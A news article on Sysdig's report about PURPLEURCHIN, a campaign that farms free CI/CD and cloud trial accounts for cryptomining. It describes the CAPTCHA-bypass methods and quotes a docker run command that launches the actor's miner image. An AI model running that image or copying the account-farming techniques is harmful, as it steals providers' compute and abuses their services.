Security researchers at Sysdig say that they have identified a previously unreported threat actor “using some of the largest cloud and continuous integration and deployment (CI/CD) service providers” in a massive “freejacking” campaign that makes use of trial accounts’ free compute to power cryptomining campaigns.
Dubbing it PURPLEURCHIN, Sysdig said the operation is highly obfuscated and “employs automation at multiple levels, with more than 130 Docker Hub images and regularly rotating CI/CD accounts on various platforms.”
Whilst such service providers use multiple efforts to ensure users are not just hitting their API endpoints PURPLEURCHIN manages to bypass all of these defenses by using VPNs and the Brave browser in initial registration, the XDOTOOL for realistic keyboard and mouse input and a Python package called Wit for speech recognition of .wav audio files which allows them to bypass CAPTCHA systems using the audio input option.
The threat actor’s efforts are “abnormal” versus the apparent reward the Sysdig Threat Research Team said.
They include efforts to spawn numerous GitHub accounts (as well as 2,000 identified accounts at development environment Heroku, and 900 identified accounts at automation platform Buddy ) and then using the free tier automated GitHub Actions CI/CD tools and their equivalents to power the actual mining operations.
Sysdig said: “We estimated that PURPLEURCHIN would need to use several thousand free accounts to earn $137” – speculating that the campaign may be the threat actor preparing to attack the underlying blockchains.
The company said in a blog post today: “Proof-of-work algorithms are vulnerable to the 51% attack, where an attacker controls 51% of a network’s hashrate, thereby controlling the “entire” network, with some caveats.”
They speculated: “With an operation of this scale, PURPLEURCHIN could potentially control the 51% majority of a cryptocurrency’s validation mechanisms, allowing them to validate arbitrary transactions associated with any of their attacker-controlled cryptocurrency wallets [allowing] them to potentially steal millions of dollars worth of cryptocurrency, depending on the market capitalizations of said currencies.”
PURPLEURCHIN Freejacking campaign: Multiple coins being mined
“When the initial observed PURPLEURCHIN Docker Hub image was executed, it triggered GitHub Actions in several repositories via HTTP” Sysdig explained. These GitHub repositories contain only workflow actions that use Docker to run different containers from the actor’s Docker Hub account. The GitHub Actions previously mentioned were used to launch 30-plus instances (per Action run) of various Docker images.
“One such example is the following command line:
docker run -d linux88884474/webappweblinux88 /bin/bash /linux88 <proxy_ip> 24000 webappapp8888 2048 32
Where the arguments following /bin/bash are:
- Script to run.
- Proxy IP.
- Proxy port to connect to.
- Name of this particular miner instance used when connecting to the Stratum proxy.
- Amount of /dev/shm memory to use (in megabytes).
- Number of bits to use in the CPU architecture.
This script, which eventually calls a nodejs file index.js, launches a Tidecoin miner. The miner uses a CPU-based mining algorithm called yespower. This is notable because cryptojackers will usually just use XMRig downloaded straight from GitHub, the de facto CPU miner for Monero, whereas PURPLEURCHIN is opting for a CPU miner that gets called via nodejs. An open question while performing this research was “Why these coins in particular?” As the value of the coins was so low, mining them seemed to be minimally profitable, even at scale. Our theory here is that the threat actor is choosing these coins based on the yespower algorithm because the mining process can be spawned from said nodejs parent, aiding in evading detection.
Tidecoin is just one of several cryptocurrencies that PURPLEURCHIN currently mines. Others include Onyx, Surgarchain, Sprint, Yenten, Arionum, MintMe, and Bitweb. The actor appears to be experimenting.